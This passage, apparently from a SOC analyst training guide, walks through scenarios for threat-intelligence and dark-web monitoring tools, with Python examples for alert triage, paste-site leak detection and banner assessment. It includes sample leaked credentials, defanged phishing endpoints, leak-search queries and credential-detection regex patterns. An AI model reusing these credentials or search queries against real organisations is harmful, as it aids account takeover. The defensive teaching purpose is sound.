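        {"source_ip": "198.51.100.8", "timestamp": t0, "priority": 5, "name": sweep},
        {"source_ip": "198.51.100.8", "timestamp": t0 + timedelta(minutes=10), "priority": 5, "name": sweep},
        {"source_ip": "203.0.113.77", "timestamp": t0 + timedelta(minutes=20), "priority": 5, "name": sweep},
        {"source_ip": "198.51.100.8", "timestamp": t0 + timedelta(hours=3), "priority": 5, "name": sweep},
    ]
    # The scanner returns three hours later and actually tries an SSH login.
    events = [{"source_ip": "198.51.100.8", "timestamp": t0 + timedelta(hours=3, minutes=5),
               "event_type": "ssh_auth_failure"}]
    return alerts, events


def run_sample():
    alerts, events = build_sample()
    engine = NoiseTriage(SAMPLE_LOOKUPS)
    return [engine.triage(alert, events) for alert in alerts]


if __name__ == "__main__":
    for decision in run_sample():
        print(decision)
```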
Step 5: Security Posture Improvement
Outcome:
• The SOC avoids wasting analyst time on false positive scans
• Analyst documents the case as a good example of internet noise detection
• Future alerts involving this scanner pattern will be suppressed unless associated
with exploit payloads
YETI
Yeti (Your Everyday Threat Intelligence) is an open-source threat intelligence platform that
helps analysts collect, organise and share structured threat data, including IOCs, TTPs and
relationships between threat entities.
Use Cases:
• Build a centralised internal repository of IOCs and threat actor data.
• Use graph-based visualisation to understand relationships between malware, IPs,
domains and threat actors.
• Enrich SIEM detections with Yeti data for triage automation.
Practical Application: During a long-term investigation of persistent phishing attacks,
the analyst uses Yeti to track relationships between domains, infrastructure, malware
hashes and targeted user groups to reveal campaign patterns and update detection
rules accordingly.
Scenario Simulation: Tracking Persistent Phishing Campaign Using Yeti
Investigation Summary
• Type of Threat: Long-running credential phishing targeting C-suite executives
• Duration: Ongoing for 3 weeks
• Observed Indicators:
o Domains: secure-m365-login[.]com, cloud-checkpoint[.]net
o IPs: [Link], [Link]
o Attachment Hashes: 72f8a4bb43d9..., 5c117dfbe3...
o Targeted Users: CEO, CFO, IT Director
• Initial Trigger: Email reported by user with spoofed login form and malicious link
Step 1: Create Campaign in Yeti
Tool Used: Yeti Web UI
Action:
• Create new campaign titled: “ExecCredPhish-APT-Summer2025”
• Tag campaign with: phishing, credential theft, business email compromise, APT-level op
Step 2: Add and Classify Entities in Yeti
Entities Created:
• Malware Hashes (Type: File, linked to dropper macros)
o 72f8a4bb43d9f1e02d93426e8a3d847f
o 5c117dfbe3c3c14b321dc2e1c8f64fdd
• Domains (Type: Hostname)
o secure-m365-login[.]com
o cloud-checkpoint[.]net
• IPs (Type: IPv4)
o [Link] (from domain resolution)
o [Link] (payload delivery server)
• Emails (Targeted Users)
o ceo@[Link]
o cfo@[Link]
o [Link]@[Link]
• TTPs
o T1566.001: Spearphishing Attachment
o T1056.001: Credential Theft via Fake Login
o T1598.002: Spearphishing Service
o T1204.002: Malicious File Attachment
Step 3: Visualise Relationships Using Yeti Graph View
Graph Analysis Output:
• Hashes linked to macro-enabled documents
• Documents delivered via phishing domains
• Domains hosted on shared bulletproof IPs
• IPs associated with prior Emotet campaigns (from imported OSINT feeds)
• Pattern shows:
o Domain registered → mass phishing → credential collection → dropper
delivery
Analyst Insight:
• Attack infrastructure reuses hosting and naming schemes
• Email targets rotate weekly, focused on high-value roles
Step 4: Enrich SIEM and Detection Logic
Action:
• Export list of IOCs from Yeti to JSON and STIX formats
• Ingest into SIEM (e.g., Splunk or QRadar) via threat intelligence platform
• Apply logic:
o Block and alert on connections to listed IPs/domains
o Match incoming emails with attachment hashes
o Alert if recipient matches VIP email group
Rule Example in Splunk:
index=email_logs
| search sender_domain IN ("[Link]", "[Link]")
| where recipient_email IN ("ceo@[Link]", "cfo@[Link]")
Step 5: Update and Maintain Threat Intel Over Time
Operational Plan:
• Analysts review campaign weekly
• Update new indicators as new emails come in
• Link future infrastructure (new IPs, domains, hashes) to the same Yeti campaign
• Use campaign intelligence for red team emulation and tabletop exercises
2. DARK WEB AND PASTE SITE MONITORING
[Link]
[Link] is a free and privacy-focused dark web search engine designed to index
.onion pages. It allows security analysts to search for leaked data, credentials, threat actor
forums and discussions hidden on the Tor network.
Use Cases:
• Search for mentions of company name, employee emails or proprietary data leaked
in underground forums.
• Detect data breaches or sensitive information exposures related to your
organisation.
• Monitor for leaked source code, credentials or financial information.
• Gather threat intelligence about attacker planning or chatter involving specific
industries or technologies.
Practical Application: A SOC analyst receives an alert about a credential stuffing
attempt targeting executive logins. They query [Link] for the executive email
addresses and discover that one was listed in a leaked credential database on a dark
web forum.
Scenario Simulation: Credential Stuffing Attempt — Dark Web Intelligence via [Link]
Incident Summary
• Alert Source: WAF + SIEM (Cloudflare + Splunk)
• Alert Type: Multiple Failed Login Attempts (Credential Stuffing Pattern)
• Target Application: [Link]
• Targeted Usernames:
o ceo@[Link]
o [Link]@[Link]
o [Link]@[Link]
• Source IPs: Spread globally (suspected via proxy/VPN)
• Timestamps: Multiple bursts of login attempts over 15 minutes
Step 1: Confirm Failed Login Pattern
Log:
{
"timestamp": "2025-08-05T08:15:24Z",
"event_type": "login_failure",
"user": "[Link]@[Link]",
"ip": "[Link]",
"source": "[Link]",
"message": "Invalid password for existing account",
"count": 23
}
Analyst Notes:
• Bursts of failed logins within seconds
• Source IPs vary per user, likely from botnet or credential stuffing tool
• Password reset attempts initiated by attacker for some accounts
Step 2: Search Exposed Credentials using [Link]
Tool Used: [Link]
Action:
• Analyst queries for:
o "ceo@[Link]"
o "[Link]@[Link]"
o "@[Link]" (domain-wide search)
o "[Link] password"
o "internalcorp sourcecode"
[Link] Results:
• Match Found for: [Link]@[Link]
o Appears in database dump titled: Corp2025_Leaked_Logins.[Link]
o Password hash: e99a18c428cb38d5f260853678922e03
o Site listed in .onion link to forum: [Link]
o Timestamp: 2025-07-29
o Additional context: Data offered in exchange for Monero payment
Step 3: Assess Breach Scope and Intelligence Value
Enrichment Summary:
• The email [Link]@[Link] appears in a credential dump on a dark
web site
• Password hash matches format used by internal legacy system
• The file also contains usernames of other employees with similar naming structure
MITRE ATT&CK Mapping:
• T1110.004: Credential Stuffing
• T1589.002: Email Addresses
• T1596.002: Search Open Websites/Dark Web
Step 4: Incident Response Actions
Containment:
• Force password reset for [Link]@[Link]
• Check whether hash is reused across other internal systems
• Enforce MFA for all VIP users if not already enabled
Detection Update:
• Enable monitoring for multiple login failures on exec accounts
• Trigger high-priority alert for any login attempt from unknown geo-location on VIP
accounts
Dark Web Monitoring Strategy:
• Add @[Link] to continuous monitoring keywords
• Configure alerting if new leaks or chatter surface related to:
o Internal source code
o Sensitive business documents
o Executive accounts
Step 5: Reporting and Documentation
Threat Intel Report Entry:
• Incident Type: External Credential Leak
• IOC: Email [Link]@[Link]
• Source: [Link] + LeaksX Forum
• Data type: Hashed password
• Impact: Credential stuffing on public web login portal
• Status: Mitigated with password reset, further monitoring ongoing
ONIONLAND
OnionLand is another dark web search engine that indexes a large number of Tor-based
.onion domains. It provides access to dark web marketplaces, forums, blogs and leak
sites.
Use Cases:
• Perform investigative research on threat actors, leaked data and malware
marketplaces.
• Search for keywords, email addresses, IPs and file hashes that may appear in
underground markets.
• Discover dark web domains hosting cloned login portals or phishing kits.
• Monitor dark web-based job postings related to cybercrime or insider threats.
Practical Application: During a ransomware incident, investigators find a reference to
the victim’s company name on a dark web extortion site. By using OnionLand, they
discover a dedicated leak page with sample data posted, confirming the attacker’s
claim.
Scenario Simulation: Ransomware Leak Validation via OnionLand
Incident Summary
• Detection Source: Endpoint + Email Gateway
• Incident Type: Ransomware Infection (Reported by SOC)
• Affected Organisation: [Link]
• Initial Payload: Invoice_Q3Report_2025.exe
• Malware Family: BlackShadow Ransomware
• Ransom Note Found:
Hello Meditech,
We have exfiltrated 93GB of your internal files. Visit our portal at:
hxxp://[Link]/leaks/meditech-pharma
Password: R3s1st
Step 1: Verify Onion Domain via OnionLand Search
Tool Used: [Link]
Action:
• Analyst queries keywords:
o "meditech-pharma"
o "blackshadow ransomware"
o "[Link]"
o "meditech password R3s1st"
OnionLand Results:
• Identifies indexed .onion page:
o hxxp://[Link]/leaks/meditech-pharma
o Page is titled: “Meditech Leak Zone”
o Timestamp: 2025-08-03
o Content:
§ 3 folders: /hr/, /finance/, /rnd/
§ 5 sample files visible (PDF, Excel, DB dump)
§ Contact: blackshadow@[Link]
• Password-protected ZIP file containing data sample from /rnd/ folder
• Claims of insider payroll data, R&D drug pipeline docs and email PSTs
Step 2: Confirm Validity of Leak
SOC Actions:
• Downloaded small sample file for forensics under controlled environment
• File hash:
d784f5e98383fa6c1f1dc7c85c1bc4b2bb1df0a321a4b293d5fa95117cd03377
• Internal team confirmed this data was not publicly accessible and came from R&D
server (RND-SRV03)
• Data included:
o Internal IPs: [Link]
o Project folder references
o Developer usernames and commit metadata
Step 3: Enrich Investigation and Engage Stakeholders
MITRE ATT&CK Mapping:
• T1486: Data Encrypted for Impact
• T1041: Exfiltration Over C2 Channel
• T1585.001: Establishing Online Presence — Website
Ransom Note IOC Inclusion:
• Onion domain: [Link]
• Email: blackshadow@[Link]
• Password string: R3s1st
• Reference keyword: "meditech" used in URL slug
Step 4: Remediation and Communication
Actions Taken:
• Notify legal and regulatory bodies (PDPA breach reporting)
• Prepare executive brief on ransomware group tactics
• Contact law enforcement with evidence of dark web leak
• Monitor the leak site continuously for expansion or sale attempts
• Add .onion domain and hashes to TI platforms and SIEM blacklist
SEARCHX
SearchX is an OSINT automation and dark web search interface that aggregates results
from multiple hidden services. It simplifies the process of searching multiple indexed
.onion sites at once.
Use Cases:
• Automate broad keyword searches across multiple Tor-indexed sources.
• Search for brand mentions, confidential documents or data leaks.
• Enrich threat intelligence reports by gathering screenshots or text from
underground forums.
• Detect impersonation or internal tools being sold on hacker marketplaces.
Practical Application: An analyst investigates a possible insider threat. Using
SearchX, they discover a post offering internal VPN credentials for sale, with
screenshots of company network access. The post includes indicators that help
validate the threat and launch containment.
Scenario Simulation: Insider Threat Exposure Discovered via SearchX
Incident Summary
• Initial Alert: Suspicious login from residential IP in another country
• Targeted Asset: VPN access to internal engineering network
• User Account: [Link]@[Link]
• GeoIP: Logged in from Bulgaria, while user is based in Malaysia
• SIEM Alert: Multiple failed VPN auths, then successful login
• Additional Context: Contractor’s contract had ended 2 weeks prior
Step 1: Search for Leak Using SearchX
Tool Used: [SearchX OSINT Platform] (self-hosted or cloud access)
Search Queries:
• "meditech vpn credentials"
• "[Link]"
• "remote RDP VPN access pharma"
• "contractor access internal"
• "@[Link]"
SearchX Results:
• Hit found on dark web forum indexed by SearchX
• Forum post title: Access to Pharma VPN - Legit Internal Credentials
• Timestamp: 2025-07-28
• Content:
o Selling access to [Link]
o Screenshots of successful login to internal network panel
o Credentials: [Link]@[Link] : A8usT4kz!
o Price: 300 USD in BTC
o Forum user handle: blackvault77
o Post tagged as verified by forum mods
Step 2: Validate Leak and Cross-Check Indicators
SOC Correlation:
• Credentials listed match the user account triggered in SIEM alert
• Password complexity matches known internal password policies
• Screenshot background and portal match internal VPN system
• IP used by attacker matches historical connection from Malaysia contractor during
contract period
MITRE ATT&CK Mapping:
• T1078: Valid Accounts
• T1583.006: Obtain Capabilities — Access Broker
• T1596: Search Open Websites/Dark Web
• T1082: System Information Discovery (shown in screenshots)
Step 3: Containment and Investigation
Immediate Actions:
• Disable [Link]@[Link] account in all systems
• Block all IPs tied to attacker login
• Rotate shared VPN gateway credentials if applicable
• Notify internal security team and HR for insider risk escalation
Hunt for Related Activity:
• Check for lateral movement attempts after login
• Review file shares, VPN logs and SSH/RDP audit logs
• Correlate timestamps with internal Git repo access and file transfer systems
Step 4: Reporting and Long-Term Response
Threat Intelligence Report Summary:
• Platform: SearchX
• Threat Type: Insider threat with dark web credential sale
• Threat Actor Alias: blackvault77
• IOC: Email, password, IP address, screenshot hash
• Source Forum: [Link]/forum/thread?id=1398
• Access Sold: Confirmed valid
Recommendations:
• Mandatory offboarding audit for all contractors
• Disable accounts within 1 day of last contract activity
• Implement Just-In-Time VPN access tied to zero-trust policy
• Continuous dark web monitoring for key assets and user accounts
INTELX (INTELLIGENCE X)
IntelX is a commercial search engine for the dark web and leaked datasets. It allows
analysts to search historic and live breaches, .onion services, WHOIS records and public
paste services.
Use Cases:
• Search for leaked documents, credentials, PII or proprietary code exposed on the
dark web.
• Investigate historical breach datasets involving internal users or third-party
vendors.
• Monitor for employee usernames and passwords appearing in recent breaches.
• Conduct due diligence on domains or companies seen in threat actor forums.
Practical Application: A cybersecurity team performs vendor risk assessments. Using
IntelX, they find credentials of one vendor’s staff exposed in multiple past breaches.
The finding prompts further review and security validation before onboarding the
vendor.
Scenario Simulation: Vendor Risk Validation Using IntelX
Context
• Event Type: Third-party vendor onboarding review
• Objective: Evaluate security hygiene of vendor before granting access to internal
systems
• Vendor: SecureCloudWare Ltd.
• Services: Provides remote IT administration tools for cloud resource provisioning
• Access Scope: SSH and API access to staging cloud environment
Step 1: Run Background Check Using IntelX
Tool Used: IntelX
Search Queries Performed:
• "@[Link]"
• "[Link]"
• "employee securecloudware"
• "site:[Link] +password +dump +2023"
• "filetype:xls OR filetype:csv securecloudware"
• "securecloudware admin password"
IntelX Results Overview
1. Credential Leak Results:
o Dumped Credential Set:
§ Email: daniel.h@[Link]
§ Password: Welcome2021!
§ Breach: sysadminportal_leak_2023
§ Date: 2023-11-14
o Email found in:
§ Hacked forums
§ Old public paste (Pastebin clone, expired now)
2. Other Employee Exposures:
o diane.r@[Link] – exposed in 2022 SaaS third-party vendor
dump
o Hash: 5f4dcc3b5aa765d61d8327deb882cf99 (weak MD5 format, reverse
reveals password)
3. Leaked Document:
o Filename: SecureCloudWare_InternalConfig2022.xlsx
o Detected via .onion mirror of dump site
o Tab: Infrastructure contains IP ranges, internal hostnames, SSH credentials
(partial)
Step 2: Threat Risk Validation and Classification
IntelX Tags Identified:
• Breach Source: Underground forum (formerly hosted on .onion)
• Data Type: Cleartext credentials, internal infrastructure
• Data Age: <2 years, still relevant
• Pastebin clone references matched keywords: "admin access" + "prod-servers"
Tactics Mapped to MITRE ATT&CK:
• T1589: Gather Victim Identity Information
• T1587.001: Obtain Capabilities — Valid Accounts
• T1586: Compromise Accounts
• T1040: Network Sniffing (from internal configuration tab)
Step 3: SOC Decision and Communication
SOC Recommendation:
• Reject full VPN/API access until vendor:
o Confirms incident response steps taken
o Rotates all impacted passwords and SSH keys
o Implements MFA and credential monitoring
• Escalate to Procurement and Legal for inclusion in vendor onboarding policy
• Flag vendor in internal Third-Party Risk Register (TPRR)
PASTEBIN SCRAPER (GITHUB)
Pastebin Scraper is an open-source tool or script (available on GitHub) used to monitor
Pastebin for sensitive data leaks such as credentials, PII, internal documents or malware
code snippets.
Use Cases:
• Monitor for newly posted pastes containing keywords like internal IPs, corporate
emails or customer data.
• Automate scraping and alerting when a specific keyword or pattern is detected in a
public paste.
• Identify early signs of data exposure before they appear in breach notification sites.
• Hunt for malware command snippets, exploit code or phishing kits being shared
publicly.
Practical Application: An organisation implements a Pastebin Scraper configured with
internal domain and IP patterns. One alert detects a paste containing admin
credentials for an internal staging server, posted anonymously. This triggers an
emergency response and password rotation.
Scenario Simulation: Internal Credential Leak Detected via Pastebin Scraper
Context
• Event Type: Proactive data leak monitoring
• Organisation: FinBank Group
• Assets at Risk: Internal staging servers, developer accounts
• Tool: Pastebin Scraper configured from open-source GitHub project
• Monitoring Rule: Regex pattern for @[Link], internal IP ranges 10.88.*.*,
staging-finbank and common credential syntax (e.g. username:password)
Step 1: Configuration of Pastebin Scraper
Script Setup:
• Deployed on internal VM (Ubuntu)
• Set to run every 10 minutes using cron
• Python script with following logic:
o Scrape most recent pastes (RSS/API or HTML if API limited)
o Extract keywords using regular expressions
o Send alert via Slack webhook if match is found
Monitored Patterns:
• "@[Link]"
• "10.88."
• "staging-finbank"
• "username:.*"
• "password:.*"
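The matching and alerting logic the three bullets above describe, written out as an added example (this is not the GitHub project's own code). It assumes the monitored corporate domain is the placeholder finbank.example (the real domain is redacted above), that pastes arrive as dicts with a title, URL and text, and that alerts are posted to a Slack incoming webhook URL supplied by the operator. Two details matter for a SOC rollout: a bare "password:" line on a stranger's paste should not page anyone, so an alert requires at least one organisation identifier to match as well; and the matched password value is redacted before it is forwarded to Slack, so the scraper does not re-leak the credential into chat history.

```python
"""Regex matcher and alert builder for a Pastebin-style scraper.

Added example, not the GitHub project's own code. Assumptions: the monitored
corporate domain is the placeholder "finbank.example" (the page redacts the
real one), pastes arrive as dicts with title/url/text, and alerts go to a
Slack incoming webhook URL supplied by the operator.
"""
import json
import re
import urllib.request
from datetime import datetime, timezone

MONITORED_DOMAIN = "finbank.example"  # placeholder for the redacted domain
WEBHOOK_URL = "https://hooks.slack.example/placeholder"  # placeholder, set via config

# One compiled regex per pattern in the monitoring rule; the key becomes the
# label shown in the alert.
PATTERNS = {
    "corporate_email": re.compile(
        r"[A-Za-z0-9._%+-]+@" + re.escape(MONITORED_DOMAIN), re.IGNORECASE),
    "internal_ip": re.compile(r"\b10\.88\.\d{1,3}\.\d{1,3}\b"),
    "staging_host": re.compile(r"\bstaging-finbank[\w.-]*", re.IGNORECASE),
    "username_field": re.compile(
        r"^\s*user(?:name)?\s*[:=]\s*(\S+)", re.IGNORECASE | re.MULTILINE),
    "password_field": re.compile(
        r"^\s*pass(?:word)?\s*[:=]\s*(\S+)", re.IGNORECASE | re.MULTILINE),
}
# Matched values under these labels are secrets and are never copied to Slack.
SECRET_LABELS = {"password_field"}
# At least one organisation identifier must hit; a bare "password:" line in
# someone else's paste should not page the SOC.
ORG_LABELS = {"corporate_email", "internal_ip", "staging_host"}


def scan_paste(text):
    """Return {label: [matched strings]} for every monitored pattern that hits."""
    hits = {}
    for label, regex in PATTERNS.items():
        found = regex.findall(text)
        if found:
            hits[label] = found
    return hits


def is_alertable(hits):
    """True only when the paste is tied to the organisation, not just any credential."""
    return any(label in hits for label in ORG_LABELS)


def build_alert(paste, hits, now=None):
    """Format the Slack message; secret values are replaced by a placeholder."""
    now = now or datetime.now(timezone.utc)
    lines = [
        "Keyword match detected in Pastebin:",
        f"Potential leaked credentials for domain {MONITORED_DOMAIN}",
        f"Paste title: {paste['title']}",
        f"Paste URL: {paste['url']}",
        f"Timestamp: {now:%Y-%m-%d %H:%M} UTC",
    ]
    for label, values in hits.items():
        shown = ["[REDACTED]"] * len(values) if label in SECRET_LABELS else values
        lines.append(f"  {label}: {', '.join(shown)}")
    return "\n".join(lines)


def send_slack(webhook_url, text):
    """POST the alert to a Slack incoming webhook (network call; not used by the test)."""
    body = json.dumps({"text": text}).encode()
    req = urllib.request.Request(
        webhook_url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def process_paste(paste, now=None):
    """Scan one paste; return the alert text if it should be raised, else None."""
    hits = scan_paste(paste["text"])
    if not is_alertable(hits):
        return None
    return build_alert(paste, hits, now)


# Constructed sample paste modelled on the scenario; hostname, IP and URL are
# made up, the password string is the one shown in the scenario.
SAMPLE_PASTE = {
    "title": "DevTestCreds - shared for review",
    "url": "https://pastebin.example/raw/abc123",
    "text": (
        "staging-finbank-01.internal\n"
        "user_admin@finbank.example\n"
        "password: SecureDev@123\n"
        "10.88.14.22\n"
    ),
}

if __name__ == "__main__":
    alert = process_paste(SAMPLE_PASTE)
    print(alert or "no alert")
    # In the cron job: if alert: send_slack(WEBHOOK_URL, alert)
```

Run from cron every 10 minutes as the scenario describes, the script only needs a fetch step in front of process_paste; the fetch is left out here because the Pastebin API terms and rate limits change and the scraping side is the part the GitHub project already provides.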
Step 2: Alert Triggered
Paste Detected:
• Timestamp: 2025-08-05 09:31 UTC
• Paste Title: DevTestCreds - shared for review
• Paste Snippet:
[Link]
user_admin@[Link]
password: SecureDev@123
[Link]
• Paste URL: [Link]
Alert Message Sent to Slack Channel #cyber-incident-monitoring:
Keyword match detected in Pastebin:
Potential leaked staging credentials for domain [Link]
Paste URL: [Link]
Timestamp: 2025-08-05 09:31 UTC
Step 3: SOC Investigation and Response
SOC Action Plan:
1. Validate Exposure:
o Access the paste (if still public)
o Confirm it contains internal usernames and passwords
2. Asset Owner Notified:
o Notify DevOps lead managing [Link]
o Confirm whether credentials are active
3. Immediate Remediation:
o Disable exposed account user_admin@[Link]
o Rotate password for staging access and SSH keys
o Reimage the internal VM hosting [Link] if breach is suspected
4. Forensic Analysis:
o Search internal logs (Sysmon, Auth logs, Firewall) for any activity from the
paste timestamp onwards
o Look for failed/successful logins using the leaked credentials
Step 4: Timeline and Reporting
Time       Action
09:31 UTC  Pastebin Scraper detects suspicious paste
09:33 UTC  Slack alert triggered and received by SOC
09:40 UTC  SOC confirms credential exposure
10:00 UTC  Internal accounts disabled and passwords rotated
10:15 UTC  Post-incident log analysis started
12:00 UTC  Incident documented in internal IR tracking system
14:00 UTC  Findings shared with CISO and DevSecOps leadership
Practical Outcome
• Data Exposure Prevented: No confirmed access attempts using exposed
credentials
• Detection Time: < 10 minutes from paste creation
• Tool Impact: Pastebin Scraper enabled proactive detection and rapid remediation
• Policy Update: Added requirement for password obfuscation in development
sharing practices
3. DOMAIN, IP AND URL INVESTIGATION
VIRUSTOTAL
VirusTotal is a widely used malware detection and URL/domain investigation platform that
aggregates the output of multiple antivirus engines, sandbox tools and URL scanners. It
provides reputation scores, behavioural analysis and file metadata.
Use Cases:
• Investigate whether a file hash, IP address, domain or URL has been flagged as
malicious.
• Review the historical relationship between a domain and associated files,
communications or hosting infrastructure.
• Use the graph feature to map infrastructure and malware relationships.
• Integrate with SIEM to auto-enrich alerts with threat intelligence.
Practical Application: An analyst finds a suspicious URL in a phishing email. They
paste it into VirusTotal and discover multiple engines flag it as malicious, with
evidence of redirection to a credential-harvesting page. The analyst blocks the
domain and updates email filters.
Scenario Simulation: Phishing URL Investigation with VirusTotal
Context
• Event Type: Suspicious Email Alert
• Target: Employee in Finance Department
• Tool: VirusTotal Web Interface and Graph
• Objective: Determine whether a link in the email is malicious and assess its threat
context
Step 1: Alert Triggered by Email Gateway
• The secure email gateway flags a message sent to [Link]@[Link] with
the subject line Urgent: Payment Request Attached
• The email contains a shortened URL: hxxps://bit[.]ly/3F1nance-Invoice
• The link redirects to hxxps://secure-check[.]online/[Link]
Step 2: Analyst Investigates with VirusTotal
Search Query:
• The analyst pastes [Link] into VirusTotal
under the "URL" tab.
VirusTotal Result Summary:
• Detection Ratio: 28/90 engines flag the URL as phishing
• Tags: phishing, credential harvest, redirect, suspicious domain
• Final Redirect Location: [Link]
• Community Comments: Several users confirm the URL is part of a widespread
phishing campaign targeting finance departments
Step 3: Use of VirusTotal Graph for Relationship Mapping
• Analyst clicks on the Graph tab
• VirusTotal displays:
o Associated domains hosted on same IP: login-mail-auth[.]online,
outlookinvoice[.]com
o Shared file hashes uploaded to VirusTotal from the domain
o SSL certificate reuse across phishing sites
o WHOIS details showing a common registrant for 6 related domains
Step 4: Analyst Actions
Immediate Actions:
• Block the domain [Link] and its redirect destination at the firewall,
proxy and DNS layers
• Submit all related URLs and IPs to email filtering system (e.g. Proofpoint) for
blacklisting
IOC Extraction and Sharing:
• Extract the following IOCs from VirusTotal:
o Malicious URLs
o Hosting IP: [Link]
o File hash: e8f764ddf2aab1f877d1ab1c7e97cf09
• Share these IOCs with other SOC teams and upload to internal threat intel platform
SIEM Correlation:
• Run a retrohunt in SIEM to check if other users clicked similar URLs
• No other hits found, confirming incident is contained to one target
Step 5: Timeline of Incident
Time   Action
09:00  Email alert triggered by secure gateway
09:05  Analyst begins URL investigation using VirusTotal
09:07  VirusTotal flags URL as phishing with 28 engines
09:10  Graph shows infrastructure linked to a known phishing group
09:15  Domain and IP blocked at all network layers
09:20  SIEM retrohunt confirms no additional compromise
09:45  IOCs documented, shared and added to internal threat feed
[Link]
[Link] is a powerful tool for scanning and analysing the behaviour of websites. It
provides screenshots, network requests, redirect chains, JavaScript execution logs and
more, enabling analysts to assess suspicious or unknown URLs.
Use Cases:
• Analyse how a URL behaves when loaded in a browser, including redirects, scripts
and embedded content.
• Identify phishing sites or malware delivery pages that mimic legitimate websites.
• Investigate domains sent via SMS, WhatsApp or email to verify their safety.
• Detect command-and-control beaconing or dropper links in campaigns.
Practical Application: A user reports receiving a suspicious shortened URL via
WhatsApp. The analyst submits it to [Link] and sees that it redirects to a fake
banking site with login fields. The phishing page is taken down and users are warned.
Scenario Simulation: Investigating a Suspicious Link with [Link]
Context
• Event Type: User-reported suspicious link received via WhatsApp
• Target: Employee in Customer Service Department
• Tool: [Link]
• Objective: Analyse redirection behaviour, site appearance and embedded scripts to
determine if the URL is phishing
Step 1: User Submits Security Report
• An employee receives a message via WhatsApp stating:
"Please verify your bank login to avoid account suspension. Click here:
hxxps://bit[.]ly/banking-verify"
• The user reports it through the internal phishing reporting form.
Step 2: Analyst Prepares for URL Analysis
• Analyst extracts and sanitises the URL:
o Shortened URL: hxxps://bit[.]ly/banking-verify
• Prepares to submit it to [Link]
Step 3: Submitting to [Link]
• Analyst enters the full URL into [Link].
• Selects "Public Scan" with JavaScript rendering enabled.
• Submits and waits for analysis to complete.
Step 4: [Link] Results
Key Findings:
• Final redirected URL: hxxps://secure-login[.]mybank-authenticate[.]com/login
• HTML title: MyBank Online Services
• Page screenshot: Visually identical to the legitimate [Link] login portal
• Embedded form action: Sends credentials to api[.]stealcreds[.]xyz
• TLS certificate: Self-signed, not issued by a trusted CA
• Detected third-party trackers and suspicious JavaScript attempting to capture
keystrokes
Network Requests:
• Multiple GET/POST requests to:
o stealcreds[.]xyz
o session-update[.]cn
• All domains are newly registered and have no historical reputation
Indicators:
• Domain age: 2 days
• Hosted in a VPS provider with no reverse DNS
• Whois shows privacy-protected registration
Step 5: Analyst Actions
Immediate Remediation:
• Add all identified domains to URL filtering and DNS blocking policies
• Submit phishing site to domain registrar and takedown services
• Notify banking partner of impersonation attempt
Communication:
• Notify all employees via internal bulletin:
o Message warning of ongoing smishing campaign using banking lures
o Instruct users not to click shortened links from WhatsApp or SMS
IOC Sharing:
• Extracted IOCs:
o Final URL: hxxps://secure-login[.]mybank-authenticate[.]com/login
o Shortlink: hxxps://bit[.]ly/banking-verify
o Malicious endpoint: api[.]stealcreds[.]xyz
• IOCs shared with external ISAC and uploaded to internal threat feed
Step 6: Timeline
Time   Action
10:30  User reports suspicious WhatsApp message
10:35  Analyst submits URL to [Link]
10:38  Scan completes showing fake banking site
10:40  IOC list compiled, URLs blocked at proxy
10:50  Phishing takedown request submitted
11:00  Internal advisory published to all staff
SHODAN
Shodan is a search engine for discovering internet-connected devices and services. It
allows users to identify exposed assets, open ports, banners, SSL certs and potential
vulnerabilities.
Use Cases:
• Investigate if a domain or IP is hosting exposed services like RDP, SMB or outdated
web servers.
• Perform external attack surface analysis for your organisation or third-party
vendors.
• Detect devices with default credentials or weak configurations.
• Monitor for assets exposing sensitive ports or misconfigured services.
Practical Application: An internal red team submits a domain to Shodan and discovers
it is linked to an old server running an outdated Apache version exposed to the
internet. This leads to patching and reconfiguration by the infrastructure team.
Scenario Simulation: Finding Exposed Services with Shodan
Context
• Event Type: External asset risk assessment
• Target: Internal legacy server hosting a deprecated portal
• Tool: Shodan ([Link])
• Objective: Identify internet-facing services and detect outdated or misconfigured
software
Step 1: Analyst Defines the Target
• The internal red team is conducting an asset discovery and decides to audit an old
subdomain:
[Link]
• They resolve the domain to an IP address: [Link]
Step 2: Using Shodan for Reconnaissance
• Analyst inputs the IP address into Shodan's search bar
• Shodan returns a detailed summary of all banners, services, ports and metadata
publicly accessible from the IP
Step 3: Shodan Results
Key Observations:
• Ports Open: 22 (SSH), 80 (HTTP), 443 (HTTPS)
• Banner on Port 80:
o Server: Apache/2.2.15 (CentOS)
o Last Updated: 2014
• SSL Certificate:
o Self-signed
o Common Name: *.[Link]
• Additional Metadata:
o Page title: “Company HR Portal”
o Exposed Directory Listing Enabled
• SSH Banner:
o OpenSSH 5.3
o Suggests potential compatibility with CVE-2016-0777 (remote info leak)
Step 4: Risk Interpretation
Attack Surface Findings:
• The server is exposed on the internet with outdated software
• Apache version is vulnerable to multiple known exploits (e.g., CVE-2017-3167)
• Use of default or self-signed certificates on external-facing assets
• Sensitive internal hostnames ([Link]) exposed in SSL certificate
• Potential risk of information disclosure through open directory listings
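The risk interpretation above is mechanical enough to automate once the Shodan record is in hand. The block below is an added example (not Shodan's code or API): it parses the Apache and OpenSSH banners shown in Step 3 into version tuples, compares them against a minimum-version baseline, and flags the self-signed certificate, wildcard common name and directory listing. The baseline versions, the host record layout, the sample IP (a documentation address) and the certificate name are assumptions; the banner strings are the ones in the scenario.

```python
"""Interpret exposed-service banners from a Shodan-style host record.

Added example, not Shodan's own code or API. The minimum acceptable versions,
the host record layout and the sample hosts are assumptions; the banner
strings mirror the scenario.
"""
import re
from dataclasses import dataclass

# Oldest version the team still tolerates on an internet-facing host. This is
# an assumed policy baseline, not a statement about specific CVEs.
BASELINE = {"apache": (2, 4, 0), "openssh": (7, 0)}

BANNER_PATTERNS = {
    "apache": re.compile(r"Apache/(\d+(?:\.\d+)+)", re.IGNORECASE),
    "openssh": re.compile(r"OpenSSH[_ ](\d+(?:\.\d+)+)", re.IGNORECASE),
}


def parse_version(text):
    """'2.2.15' -> (2, 2, 15) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def version_str(version):
    return ".".join(str(part) for part in version)


def detect_software(banner):
    """Return (product, version tuple) if the banner names a product we track."""
    for product, regex in BANNER_PATTERNS.items():
        match = regex.search(banner)
        if match:
            return product, parse_version(match.group(1))
    return None


@dataclass
class HostRecord:
    ip: str
    banners: dict            # port -> banner text as Shodan would display it
    cert_self_signed: bool
    cert_common_name: str
    directory_listing: bool


def assess(host):
    """Return a list of (severity, finding) tuples for one host record."""
    findings = []
    for port, banner in sorted(host.banners.items()):
        detected = detect_software(banner)
        if detected is None:
            continue
        product, version = detected
        floor = BASELINE[product]
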